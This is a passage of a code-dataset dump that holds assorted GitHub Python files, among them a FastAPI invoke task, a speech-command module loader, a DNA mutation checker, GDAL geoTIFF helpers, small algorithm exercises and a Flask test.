compounding(starting_bal,actual_rate(),duration) \nprint(Fore.MAGENTA+\"total :- \",result) \n\nplt.bar(time_du, principal_graph,color='green')\n\nfor a,b in zip(time_du, principal_graph): \n plt.text(a, b, str(b))\n\nplt.title(\"calculation Plot\", fontsize=28)\nplt.ylabel(\"principal\", fontsize=18)\n\nplt.xlabel(\"time\", fontsize=18)\n# plt.show() \n","repo_name":"RSM009/calculator","sub_path":"real_earning_calculator.py","file_name":"real_earning_calculator.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2920101498","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : tasks.py\n@Time : 2020/3/16 13:36\n@Author : Flack\n@Email : opencoding@hotmail.com\n@ide : PyCharm\n@project : fastapitutorial\n@description : 描述\n\"\"\"\nfrom datetime import datetime\nfrom invoke import task\n\n\n@task()\ndef d(c):\n \"\"\"\n local task automation debugging tools (fastapi service)\n :param c:\n :return:\n \"\"\"\n deploy(c)\n\n\n@task(help={})\ndef deploy(c):\n \"\"\"\n local task automation debugging tools (fastapi service)\n :param c:\n :return:\n \"\"\"\n c.run('echo fastapi service start')\n c.run('echo {}'.format('*' * 100))\n c.run('echo author:flack')\n c.run('echo date:{}'.format(datetime.now()))\n c.run('echo descr:{}'.format('自动化任务调式启动fastapi服务'))\n c.run('echo version:{}'.format('v2.0.1'))\n c.run('echo {}'.format('*' * 100))\n c.run('python worker.py')\n c.run('echo fastapi service stop')\n c.run('echo {}'.format('*' * 100))\n","repo_name":"HeywoodKing/FastAPITutorial","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70065060675","text":"from recognition.actions import library\nimport lark.exceptions\nimport os\nimport os.path\nimport xml.etree.ElementTree as ET\nimport copy\nimport operator\nimport collections\nimport log\nimport recognition.actions.library.stdlib\nfrom recognition.actions import perform\nimport settings\nfrom recognition.actions import variables, perform\nfrom recognition.commands import grammar\nfrom recognition import command_module\nfrom recognition.rules.converter import SrgsXmlConverter\nfrom recognition.rules import astree\nfrom recognition import lark_parser\nfrom communication import pubsub, topics\nfrom common import limited_size_dict\nimport recognition.cache\nimport clargs\n\nDEFAULT_DIRECTORY_SETTINGS = {\n 'recurse': True,\n 'conditions': {},\n}\n\nPRIORITY_FN = operator.attrgetter('priority')\n\nclass CommandModuleController:\n\n def __init__(self, module_loader):\n self.module_loader = module_loader\n self.grammars = limited_size_dict.LimitedSizeDict(size_limit=5)\n self.map_grammar_to_commands = collections.OrderedDict()\n self.command_modules = {}\n self.active_command_modules = {}\n self.map_nodes_to_command_module = {}\n self.namespace = recognition.actions.library.stdlib.Namespace()\n self.grammar_xml_cache = limited_size_dict.LimitedSizeDict(size_limit=10)\n\n def initialize_command_modules(self):\n if settings.settings['clean_cache']:\n recognition.cache.delete_cache()\n recognition.actions.library.stdlib.initialize()\n command_module_cache = recognition.cache.load_cache()\n new_cache = recognition.cache.empty_cache()\n files = self.module_loader.load_files()\n command_modules = {}\n for full_path, text in files.items():\n if full_path.endswith('.speak'):\n if text in command_module_cache['command_modules']:\n cmd_module_json_str = command_module_cache['command_modules'][text]\n cmd_module = recognition.cache.from_text(cmd_module_json_str)\n else:\n try:\n module_ir = lark_parser.parse_command_module(text)\n except (lark.exceptions.UnexpectedCharacters, lark.exceptions.UnexpectedEOF) as e:\n print(f'Error parsing command module {full_path}:\\n{e}')\n print('Continuing...')\n continue\n text_by_line = text.split('\\n')\n cmd_module = command_module.command_module_from_lark_ir(module_ir, text_by_line)\n if 'on_load' in cmd_module.functions:\n namespace = self.get_namespace()\n source = {'command_module': cmd_module, 'type': 'command_module_loaded'}\n action = cmd_module.functions['on_load'].action\n perform.perform_action_from_event(action, namespace, source)\n command_modules[full_path] = cmd_module\n cmd_module.relative_path = os.path.relpath(full_path, self.module_loader.root)\n cmd_module.absolute_path = full_path\n new_cache['command_modules'][text] = recognition.cache.to_json_string(cmd_module)\n recognition.cache.save_cache(new_cache)\n return command_modules\n \n def get_active_modules(self, current_window: str):\n active_modules = {}\n for path, cmd_module in self.command_modules.items():\n if cmd_module.is_active(current_window):\n active_modules[path] = cmd_module\n return active_modules\n\n def load_modules(self, current_window, initialize_modules: bool=False):\n previous_active_modules = self.sorted_command_modules(self.active_command_modules)\n if initialize_modules:\n raise NotImplementedError\n self.active_command_modules = self.get_active_modules(current_window)\n command_modules_by_ascending_priority = self.sorted_command_modules(self.active_command_modules)\n namespace = self.get_namespace()\n self.fire_activation_events(previous_active_modules, command_modules_by_ascending_priority, namespace)\n grammar_context = self.build_grammar(command_modules_by_ascending_priority.values())\n if grammar_context is not None:\n self.grammars[grammar_context.uuid] = grammar_context\n grammar_xml, grammar_id = ET.tostring(grammar_context.xml).decode('utf8'), grammar_context.uuid\n if grammar_xml in self.grammar_xml_cache:\n grammar_context.recognition_cache = copy.copy(self.grammar_xml_cache[grammar_xml].recognition_cache)\n self.grammar_xml_cache[grammar_xml] = grammar_context\n pubsub.publish(topics.LOAD_ENGINE_GRAMMAR, grammar_xml, grammar_id)\n\n def build_grammar(self, command_modules_by_ascending_priority) -> grammar.GrammarContext:\n named_utterances, commands, utterance_priority = self.get_active_named_utterances_and_commands(command_modules_by_ascending_priority)\n cycles = self.calculate_named_utterance_cycles(named_utterances)\n if cycles:\n s = \"\" if len(cycles) == 1 else \"s\"\n print(f'Unable to load grammar - found utterance cycle{s}')\n for cycle in cycles:\n print(' -> '.join(cycle))\n print('')\n return\n command_utterances = [cmd.utterance for cmd in commands]\n all_utterances = list(named_utterances.values()) + command_utterances\n node_ids = self.generate_node_ids(all_utterances)\n namespace = self.get_namespace()\n command_contexts = {}\n for cmd in commands:\n variable_tree = variables.RecognitionResultsTree(cmd.utterance, node_ids, named_utterances)\n command_contexts[node_ids[cmd.utterance]] = cmd, variable_tree\n grammar_xml = self.build_grammar_xml(all_utterances, node_ids, named_utterances)\n grammar_context = grammar.GrammarContext(grammar_xml, command_modules_by_ascending_priority, command_contexts, commands, namespace, named_utterances, node_ids, utterance_priority)\n return grammar_context\n\n def sorted_command_modules(self, command_modules):\n sorted_modules = {}\n for path in sorted(command_modules, key=lambda x: (command_modules[x].priority)):\n sorted_modules[path] = command_modules[path]\n return sorted_modules\n\n def get_namespace(self):\n ns = recognition.actions.library.stdlib.namespace.copy()\n for mod in self.active_command_modules.values():\n ns.update(mod.functions)\n return ns\n\n def generate_node_ids(self, utterances):\n node_ids = {}\n for utterance in utterances:\n for node in utterance.walk():\n if node not in node_ids:\n node_ids[node] = f'n{len(node_ids) + 1}'\n return node_ids\n\n def fire_activation_events(self, previous_active_modules, current_active_modules, namespace):\n for path, cmd_module in previous_active_modules.items():\n if path not in current_active_modules and 'on_deactivate' in cmd_module.functions:\n source = {'command_module': cmd_module, 'type': 'command_module_deactivated'}\n action = cmd_module.functions['on_deactivate'].action\n perform.perform_action_from_event(action, namespace, source)\n for path, cmd_module in current_active_modules.items():\n if path not in previous_active_modules and 'on_activate' in cmd_module.functions:\n source = {'command_module': cmd_module, 'type': 'command_module_activated'}\n action = cmd_module.functions['on_activate'].action\n perform.perform_action_from_event(action, namespace, source)\n\n def build_grammar_xml(self, all_active_rules, node_ids, named_rules):\n return SrgsXmlConverter(node_ids, named_rules).build_grammar(all_active_rules)\n\n def get_active_named_utterances_and_commands(self, command_modules_by_ascending_priority):\n named_utterances = {}\n named_utterances.update(self.special_rules())\n utterance_priority = {}\n active_commands = []\n for cmd_module in command_modules_by_ascending_priority:\n for name, utterance in cmd_module.named_utterances.items():\n utterance_priority[utterance] = cmd_module.priority\n named_utterances[name] = utterance\n for command in cmd_module.commands:\n utterance_priority[command.utterance] = cmd_module.priority\n active_commands.append(command)\n return named_utterances, active_commands, utterance_priority\n\n def special_rules(self):\n return {'_dictation': astree.Rule()}\n\n def calculate_named_utterance_cycles(self, named_utterances):\n graph = DirectedGraph()\n for name, utterance in named_utterances.items():\n for utterance_piece in utterance.walk():\n if isinstance(utterance_piece, astree.RuleReference):\n graph.add_edge(name, utterance_piece.rule_name)\n return self.cycles_from_graph(graph)\n\n def cycles_from_graph(self, graph):\n nodes_with_cycles = set()\n unvisited = set()\n visiting = set()\n visited = set()\n cycles = []\n for name in graph.adjacency_list:\n unvisited.add(name)\n while unvisited:\n node = unvisited.pop()\n visiting.add(node)\n path = (node,)\n node_cycles = self.detect_node_cycles(graph, node, unvisited, visiting, visited, path)\n cycles.extend(node_cycles)\n return cycles\n\n def detect_node_cycles(self, graph, node, unvisited, visiting, visited, path):\n # node is in visiting, last item in path\n cycles = []\n adjacent_nodes = graph.adjacency_list[node]\n for adj in adjacent_nodes:\n if adj in unvisited: # adjacent is unvisited, recurse down\n unvisited.remove(adj)\n visiting.add(adj)\n child_path = path + (adj,)\n adj_cycles = self.detect_node_cycles(graph, adj, unvisited, visiting, visited, child_path)\n cycles.extend(adj_cycles)\n elif adj in visiting: # found a cycle\n cycle_path = None\n for i, path_node in enumerate(path):\n if path_node == adj:\n cycle_path = path[i:]\n break\n assert cycle_path\n cycles.append(cycle_path + (adj,))\n else: #\n assert adj in visited\n visiting.remove(node)\n visited.add(node)\n return cycles\n\nclass StaticFileCommandModuleLoader:\n\n def __init__(self, root, command_module_file_pattern):\n self.root = root\n self.command_module_file_pattern = command_module_file_pattern\n self.file_cache = limited_size_dict.LimitedSizeDict(size_limit=1000)\n\n def load_files(self):\n directory_contents = {}\n if not os.path.isdir(self.root):\n os.makedirs(self.root)\n directory_contents = self.load_directory(self.root, DEFAULT_DIRECTORY_SETTINGS)\n return directory_contents\n\n def load_directory(self, path: str, parent_directory_settings):\n command_modules = {}\n directories = []\n local_settings = settings.try_load_json_file(os.path.join(path, '.osspeak.json'))\n directory_settings = {**parent_directory_settings, **local_settings}\n with os.scandir(path) as i:\n for entry in sorted(i, key=lambda x: x.name):\n if entry.name.startswith('.'):\n continue\n if entry.is_file() and entry.name.endswith('.speak') and self.command_module_file_pattern in entry.name:\n path = entry.path\n file = self.file_cache.get(path, CommandModuleFile(path))\n self.file_cache[path] = file\n command_modules[path] = file.contents\n # read files in this directory first before recursing down\n elif entry.is_dir():\n directories.append(entry)\n if directory_settings['recurse']:\n for direntry in directories:\n command_modules.update(self.load_directory(direntry.path, directory_settings))\n return command_modules\n\nclass CommandModuleFile:\n\n def __init__(self, path):\n self.path = path\n self.last_modified = None\n self._contents = None\n\n @property\n def contents(self):\n last_modified = os.path.getmtime(self.path)\n if self._contents is None or last_modified > self.last_modified:\n self.last_modified = last_modified\n with open(self.path) as f:\n self._contents = f.read()\n return self._contents\n\nclass DirectedGraph:\n\n def __init__(self):\n self.adjacency_list = {}\n \n def add_edge(self, from_vertex, to_vertex):\n self.add_vertex(from_vertex)\n self.add_vertex(to_vertex)\n self.adjacency_list[from_vertex].add(to_vertex)\n\n def add_vertex(self, value):\n if value not in self.adjacency_list:\n self.adjacency_list[value] = set()","repo_name":"osspeak/osspeak","sub_path":"osspeak/recognition/commands/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":13267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23570898001","text":"def brStalls(filename):\r\n f=open(filename,'rU')\r\n tc=int(f.readline())\r\n g=open('tdlarge.out','w')\r\n\r\n for i in range(tc):\r\n x,people=list(map(int,f.readline().split()))\r\n nbathRooms=x+2\r\n s='1'+('0'*x)+'1'\r\n l=list(s)\r\n while people!=0:\r\n zeroes=max(s.split('1'),key=len)\r\n maxlen=len(zeroes)\r\n lindex=s.find(zeroes)\r\n mid=maxlen//2\r\n people-=1\r\n if maxlen%2==0:\r\n place=lindex+mid-1\r\n l[place]='1'\r\n ls=l[0:place][::-1].index('1')\r\n rs=l[place+1:].index('1')\r\n s=''.join(l)\r\n else:\r\n place=lindex+mid\r\n l[place]='1'\r\n ls=l[0:place][::-1].index('1')\r\n rs=l[place+1:].index('1')\r\n s=''.join(l)\r\n \r\n g.write(('Case #%d: %d %d\\n')%(i+1,max(ls,rs),min(ls,rs)))\r\nbrStalls('C-small-1-attempt0.in')\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2627.py","file_name":"2627.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13482668946","text":"#function to ask user input x7 and return observations stored in a list\n\ndef observed():\n observations = []\n for count in range(7):\n print(\"Please enter an observation:\")\n observations.append(input())\n\n return observations\n\n\n#run the above function and collate the data into a set to then print iterations of each - stored in data\ndef run():\n print(\"Counting Observations:\")\n user_observation = observed()\n user_observation_set = set()\n for observation in user_observation:\n data = (observation, user_observation.count(observation))\n user_observation_set.add(data)\n for data in user_observation_set:\n print(f\"{data[0]} observed {data[1]} times!\")\n\nrun()\n#if entering more than 2 different observations, the print function will still work!\n","repo_name":"lawrencepj13/com728","sub_path":"data/sets/set_from_list.py","file_name":"set_from_list.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71406758595","text":"# coins.py\ndef coin_bag(n,coins):\n\tarr = [0]*(n+1)\n\tfor c in coins:\n\t\t# print(\"c =\",c)\n\t\tif c <= n: arr[c] += 1\t# can we use coin c at all?\n\n\t\tfor m in range(c,n+1):\n\t\t\t# Start at m = c to eliminate (>= 0) branch\n\t\t\t# print(\"\\tm =\",m)\n\t\t\t# print(\"\\t\\tlookback\",m-c,arr[m-c])\n\t\t\tarr[m] = arr[m] + arr[m-c]\n\n\tprint(arr)\n\treturn arr[n]\n\n\nprint(coin_bag(4,[1,2,3]))\nprint(coin_bag(10,[2,5,3,6]))\n","repo_name":"lh3nry/interview_prep","sub_path":"coins.py","file_name":"coins.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24041656012","text":"import numpy as np\n\n\nclass JTController:\n \"\"\"\n # Usage\n self.jt = JTController(self.skel)\n tau += self.jt.apply( [\"l_hand\", \"r_hand\"], f )\n \"\"\"\n def __init__(self, _skel):\n self.skel = _skel\n\n def apply(self, bodynames, f):\n if not isinstance(bodynames, list):\n bodynames = [bodynames]\n f = np.array(f)\n\n tau = np.zeros(self.skel.ndofs)\n for bodyname in bodynames:\n # J = self.skel.getBodyNodeWorldLinearJacobian(bodyname)\n J = self.skel.body(bodyname).world_linear_jacobian()\n JT = np.transpose(J)\n tau += JT.dot(f)\n return tau\n","repo_name":"sehoonha/pydart","sub_path":"apps/bipedJump/jacobian_transpose.py","file_name":"jacobian_transpose.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"37259745727","text":"import requests, pickle\r\nfrom xml.etree import ElementTree\r\nfrom hide import URL\r\n\r\nclass DataController:\r\n def __init__(self):\r\n self.recycles = []\r\n\r\n # parsing한 data를 각각 dict타입으로 묶은 후 모든 data를 list형태로 저장\r\n def parsingData(self):\r\n response = requests.get(URL)\r\n print(response.status_code)\r\n xmlStr = response.text\r\n root = ElementTree.fromstring(xmlStr)\r\n allItems = root.iter('item')\r\n for item in allItems:\r\n recycleDict = {}\r\n recycleDict['name'] = item.find(\"dicItemNM\").text\r\n recycleDict['dump'] = item.find(\"outMeth\").text\r\n self.recycles.append(recycleDict)\r\n\r\n def saveData(self, DATA):\r\n with open(\"recycle.dat\", \"wb\") as f:\r\n pickle.dump(DATA, f, pickle.HIGHEST_PROTOCOL)\r\n\r\n def loadData(self):\r\n with open(\"recycle.dat\", \"rb\") as f:\r\n datas = pickle.load(f)\r\n return datas\r\n","repo_name":"stich9208/SWP2_AD","sub_path":"ADproject/dataController.py","file_name":"dataController.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4455023633","text":"import random\n\ndef tas_kagit_makas(): # tas_kagit_makas() adında bir fonksiyon tanımlandı\n secenekler = [\"Taş\", \"Kağıt\", \"Makas\"] # secenekler adında bir liste oluşturuldu\n\n while True: # sonsuz döngü\n print(\"1. Taş\")\n print(\"2. Kağıt\")\n print(\"3. Makas\")\n print(\"4. Çıkış\")\n\n secim = int(input(\"Seçiminizi girinizç. (1-3): \")) # kullanıcıdan seçim alındı\n\n if secim == 4: # eğer 4'e eşitse\n print(\"Çıkış yapılıyor...\")\n break # program durduruldu\n\n elif secim in [1, 2, 3]:\n bilgisiyar_secim = random.choice(secenekler) # bilgisiyardan rastgele seçenek alınır\n kullanici_secim = secenekler[secim - 1] # kullanıcıdan seçenek alınır \n\n print(f\"Siz: {kullanici_secim} / Bilgisiyar: {bilgisiyar_secim}\") # ekrana yazdırılır\n\n if kullanici_secim == bilgisiyar_secim: \n print(\"Berabere!\")\n elif (kullanici_secim == \"Taş\" and bilgisiyar_secim == \"Makas\") or \\\n (kullanici_secim == \"Kağıt\" and bilgisiyar_secim == \"Taş\") or \\\n (kullanici_secim == \"Makas\" and bilgisiyar_secim == \"Kağıt\"):\n print(\"Tebrikler kazandınız :) \")\n else:\n print(\"Bilgisayar kazandı!\")\n else:\n print(\"Geçersiz seçim. Tekrar deneyin.\")\n\ntas_kagit_makas()","repo_name":"HakanAknc/Python_mini_projects","sub_path":"TemelSorular/TasKagitMakasOyunu.py","file_name":"TasKagitMakasOyunu.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23184417568","text":"import numpy as np\nimport timeit\n\ndef checkDna(dnaStrip):\n mutantChains = [\"AAAA\",\"CCCC\",\"GGGG\",\"TTTT\"]\n mutationsCount=0\n for mutantChain in mutantChains:\n if mutantChain in dnaStrip:\n mutationsCount+=dnaStrip.count(mutantChain)\n if mutationsCount>1:\n break\n\n return mutationsCount\n\ndef isMutant(dna):\n\n mutations = 0\n ticInit=timeit.default_timer()\n for dnaRow in dna:\n mutations+= checkDna(dnaRow)\n if mutations>1:\n print('1st loop time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n print('Total time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n return True\n print('1st loop time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n\n tic=timeit.default_timer()\n dnaMatrix = np.array([list(row.encode()) for row in dna])\n print('Matrix generation: ',(timeit.default_timer()-tic)*1000,'ms')\n\n tic=timeit.default_timer()\n dnaMatrixT = dnaMatrix.T\n for column in dnaMatrixT:\n dnaColumn = bytes(column.tolist()).decode()\n mutations+= checkDna(dnaColumn)\n if mutations>1:\n print('2nd loop time: ',(timeit.default_timer()-tic)*1000,'ms')\n print('Total time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n return True\n print('2nd loop time: ',(timeit.default_timer()-tic)*1000,'ms')\n\n tic=timeit.default_timer()\n dnaMatrixF = np.fliplr(dnaMatrix)\n lenRow=len(dna)\n for offset in range(-lenRow+4,lenRow-3):\n dnaDiagonal = bytes(np.diagonal(dnaMatrix,offset).tolist()).decode()\n dnaDiagonalF = bytes(np.diagonal(dnaMatrixF,offset).tolist()).decode()\n mutations+= checkDna(dnaDiagonal + \" \" + dnaDiagonalF)\n if mutations>1:\n print('3rd loop time: ',(timeit.default_timer()-tic)*1000,'ms')\n print('Total time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n return True\n print('3rd loop time: ',(timeit.default_timer()-tic)*1000,'ms')\n print('Total time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n return False\n\ndef dnaGenerator(size,noMutant=False):\n dna=[]\n dnaStrings=['A','C','G','T']\n if noMutant:\n dnaStrings=['Z','Y','X','W']\n for index in range(size):\n dna.append(\"\".join([dnaStrings[np.random.randint(0,len(dnaStrings))] for i in range(size)]))\n return dna\n\nmutantDna = [\"ATGCGA\",\"CAGTGC\",\"TTATGT\",\"AGAAGG\",\"CCCCTA\",\"TCACTG\"]\nnormalDna = [\"ATGCGA\",\"CAGTGC\",\"TTATTT\",\"AGACGG\",\"GCGTCA\",\"TCACTG\"]\nprint('isMutant?: ', isMutant(mutantDna))\nprint('isMutant?: ', isMutant(normalDna))\n\nrandomDna=dnaGenerator(100,True)\nticInit=timeit.default_timer()\nprint('isMutant? (dnaGenerator): ',isMutant(randomDna))\nprint('Total main time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n","repo_name":"jfmatheusg/magneto","sub_path":"mutant.py","file_name":"mutant.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39482237121","text":"import numpy as np\nimport numpy.random as npr\nimport StanfordTrees as st\nimport LNLayers as lnl\nimport LayerNets as ln\nimport random as random\nfrom time import clock\nfrom sys import stdout as stdout\n\ndef simple_stb_test(tree_dir='./trees'):\n stb_data = st.SimpleLoad(tree_dir)\n return\n\nif __name__ == '__main__':\n tree_dir = './trees'\n stb_data = st.SimpleLoad(tree_dir)\n max_lut_idx = max(stb_data['lut_keys'].values())\n basic_opts = {}\n basic_opts['class_count'] = 5\n lut_opts = {}\n lut_opts['max_key'] = max_lut_idx\n lut_opts['embed_dim'] = 30\n lut_opts['max_norm'] = 2.0\n basic_opts['lut_layer'] = lut_opts\n\n # Initialize a network\n KMN = ln.KMaxNet(basic_opts)\n KMN.init_weights(w_scale=0.05, b_shift=0.1)\n\n # Get a \"flattened\" list of training phrases and classes\n train_phrases = []\n train_labels = []\n for (phrases, labels) in zip(stb_data['train_phrases'], stb_data['train_labels']):\n train_phrases.extend(phrases)\n train_labels.extend(labels)\n\n batch_size = 50\n epoch_batches = 2500\n learn_rate = 0.01\n train_pairs = [(phrase, label) for (phrase, label) in zip(train_phrases, train_labels)]\n train_phrases = []\n train_labels = []\n for e in range(500):\n print(\"Starting epoch {0:d}, {1:d} batches\".format(e, len(train_pairs)/batch_size))\n stdout.flush()\n # Reset batch extraction indices and completed batch counter\n batch_start = 0\n batch_end = batch_start + batch_size\n completed_batches = 0\n # Perform batch updates for the current epoch\n L = 0.0\n acc = 0.0\n t1 = clock()\n random.shuffle(train_pairs)\n if ((e % 5) == 0):\n KMN.reset_moms(ada_init=0.0, clear_moms=False)\n while ((batch_end < len(train_pairs)) and (completed_batches < epoch_batches)):\n # Extract the current training phrase/label batch\n batch_pairs = train_pairs[batch_start:batch_end]\n # Train on this batch, and count its completion\n Xb = [pair[0] for pair in batch_pairs]\n Yb = [pair[1] for pair in batch_pairs]\n res = KMN.process_training_batch(Xb, Yb, learn_rate, use_dropout=True)\n L += res[0]\n acc += res[1]\n completed_batches += 1\n # Advance batch extraction indices\n batch_start = batch_start + batch_size\n batch_end = batch_start + batch_size\n # Print diagnostic info from time-to-time\n if ((completed_batches % 50) == 0):\n print(\"completed {0:d} updates, with loss {1:.4f} and acc {2:.4f}\".format( \\\n completed_batches, (L / 50.0), (acc / 50.0)))\n L = 0.0\n acc = 0.0\n t2 = clock()\n print(\"-- time: {0:.2f}\".format(t2-t1))\n t1 = clock()\n stdout.flush()\n\n\n\n##############\n# EYE BUFFER #\n##############\n","repo_name":"Philip-Bachman/NN-Python","sub_path":"nlp/nlp_convnet/STBTests.py","file_name":"STBTests.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"5255613236","text":"import pandas as pd\nimport numpy as np\n\n# An Index is an immutable ndarry implementing an orderered sliceable set.\n# The basic object for storing axis labels for all pandas objects\nindex = pd.date_range('1/1/2000', periods=8)\n\n# A series is a 1D ndarray with axis labels. The labels need not be unique\n# but must be hashable. The objext supports both integer and label indexing.\n# 100 x 1 series of random numbers\nlong_series = pd.Series(np.random.randn(100))\nls = long_series.array # Get the data in a list-like array\n\n# A Dataframe is a 2D, size-mutable, potentially heterogeneous tabular data\n# structure with labeled axes (rows and columns). Can be though of as a\n# dict-like container for Series objects\n# 5 x 5 table of random numbers\nsmall_df = pd.DataFrame(np.random.randn(5, 5))\n\n# TYPICALLY ALL PANDAS FUNCTIONS RETURN A NEW DATAFRAME, RATHER THAN APPLYING\n# THE FUCNTIONARLITY IN SITU - INPLACE TYPICALLY FORCES THE ACTION TO HAPPEN\n# TO THE DATAFRAME ITSELF\n\nprint(pd.MultiIndex.from_tuples([(1, 'a'), (1, 'b'), (1, 'c'), (2, 'a')],\n names=['1st', '2nd']))\n\nsmall_df.mean(0) # Will calculate the mean of all the columns\nsmall_df.mean(1) # \" \" \" rows\nsmall_df.idxmin(axis=0, skipna=True) # Calculates index of smallest value\n# in each column, skipping NaNs\n\nrn = small_df.rename(columns={0: 'Zero', 1: 'One'}) # Rename two of the\n# columns\nprint(rn.drop([\"Zero\"], axis=1)) # Drop the zero'th column\n","repo_name":"mattingram0/AdvancedResearchProject","sub_path":"tutorials/pandas2.py","file_name":"pandas2.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30056840393","text":"import logging\nfrom osgeo import gdal\n\n\ndef create_empty(fname, inp_proj, clear_img=False):\n \"\"\"\n Create empty geoTiff-image based on metadata from another geoTiff image. Metadata could be obtained by method\n get_projection().\n :param fname: Full path to new created image\n :param inp_proj: Projection dictionary metadata from another geoTiff image\n :param clear_img: If True, fill new image by 0(spends much more time). Default is False.\n :return:\n \"\"\"\n driver = gdal.GetDriverByName('GTiff')\n\n outfn = fname\n dtype = gdal.GDT_Byte\n inp_shape = inp_proj['shape']\n nbands = 4\n nodata = 255\n\n ds = driver.Create(outfn, inp_shape[1], inp_shape[0], nbands, dtype, options=['COMPRESS=LZW', 'TILED=YES'])\n ds.SetProjection(inp_proj['projection'])\n ds.SetGeoTransform(inp_proj['geotransform'])\n\n if clear_img:\n for i in range(nbands):\n ds.GetRasterBand(1+i).Fill(0)\n ds.GetRasterBand(1+i).SetNoDataValue(nodata)\n ds.FlushCache()\n\n del ds # close file\n\n\ndef put_into_image(fname, start_xy, bgra):\n \"\"\"\n Put into already created geoTiff image BGRA patch by specific XY-position.\n :param fname: Full path to existing geoTiff image\n :param start_xy: X/Y pixel position where patch will be placed\n :param bgra: BGRA (8-bit per channel)\n :return:\n \"\"\"\n rgba = [2, 1, 0, 3]\n ds = gdal.Open(fname, gdal.GA_Update)\n for band_ind in range(4):\n out_band = ds.GetRasterBand(band_ind + 1)\n # GDAL operate with bands first dim\n out_band.WriteArray(bgra[..., rgba[band_ind]], xoff=int(start_xy[0]), yoff=int(start_xy[1]))\n\n del ds # close file\n\n\ndef get_projection(inp):\n dataset = gdal.Open(inp)\n if dataset is None:\n logging.error('Unable to open {}'.format(inp))\n return None\n\n projection = dataset.GetProjection()\n geotransform = dataset.GetGeoTransform()\n\n if projection is None and geotransform is None:\n logging.error('No projection or geotransform found on file {}'.format(inp))\n return None\n\n gcp_count = dataset.GetGCPCount()\n gcps = dataset.GetGCPs()\n gcp_proj = dataset.GetGCPProjection()\n\n del dataset\n\n result = dict()\n result['projection'] = projection\n result['geotransform'] = geotransform\n result['gcp_count'] = gcp_count\n result['gcps'] = gcps\n result['gcp_proj'] = gcp_proj\n\n return result\n\n\ndef apply_projection(inp_proj, output):\n dataset2 = gdal.Open(output, gdal.GA_Update)\n\n if dataset2 is None:\n logging.error('Unable to open {}'.format(output))\n return -1\n\n geotransform = inp_proj['geotransform']\n projection = inp_proj['projection']\n gcp_count = inp_proj['gcp_count']\n gcps = inp_proj['gcps']\n gcp_proj = inp_proj['gcp_proj']\n\n if geotransform is not None and geotransform != (0, 1, 0, 0, 0, 1):\n dataset2.SetGeoTransform(geotransform)\n\n if projection is not None and projection != '':\n dataset2.SetProjection(projection)\n\n if gcp_count != 0:\n dataset2.SetGCPs(gcps, gcp_proj)\n\n del dataset2\n\n return 0\n\n\ndef copy_projection(inp, output):\n src_projection = get_projection(inp)\n\n if src_projection is None:\n return -1\n\n ret_code = apply_projection(src_projection, output)\n\n return ret_code\n\n\ndef create_tiles(args):\n from .gdal2tiles import GDAL2Tiles\n\n err_code = 0\n argv = gdal.GeneralCmdLineProcessor(args)\n try:\n if argv:\n gdal2tiles = GDAL2Tiles(argv[1:])\n gdal2tiles.process()\n except Exception:\n err_code = -1\n\n return err_code\n","repo_name":"oradzhabov/bigimage","sub_path":"tools/gdalcopyproj.py","file_name":"gdalcopyproj.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31231294268","text":"from test import app\nimport pytest\nimport re\nimport json\n\n@pytest.fixture\ndef client(request):\n client = app.test_client()\n\n return client\n\ndef test_virtual_alias_post(client):\n rv = client.post('/virtualhostalias')\n # This request should return error with no data\n error_regex = re.compile(\"(ERROR)\")\n assert error_regex.search(rv.data) is not None\n assert rv._status_code == 400\n\n # Let's try the POST with some data\n data = {'name':'test'}\n rv = client.post('/virtualhostalias', data=json.dumps(data), content_type='application/json')\n assert rv._status_code == 201\n assert 'test' in rv.data\n\ndef test_virtual_alias_index(client):\n rv = client.get('/virtualhostalias')\n assert rv._status_code == 200\n\n assert rv.headers[0] == ('Content-Type', 'application/json')\n assert 'test' in rv.data\n assert '_id' in 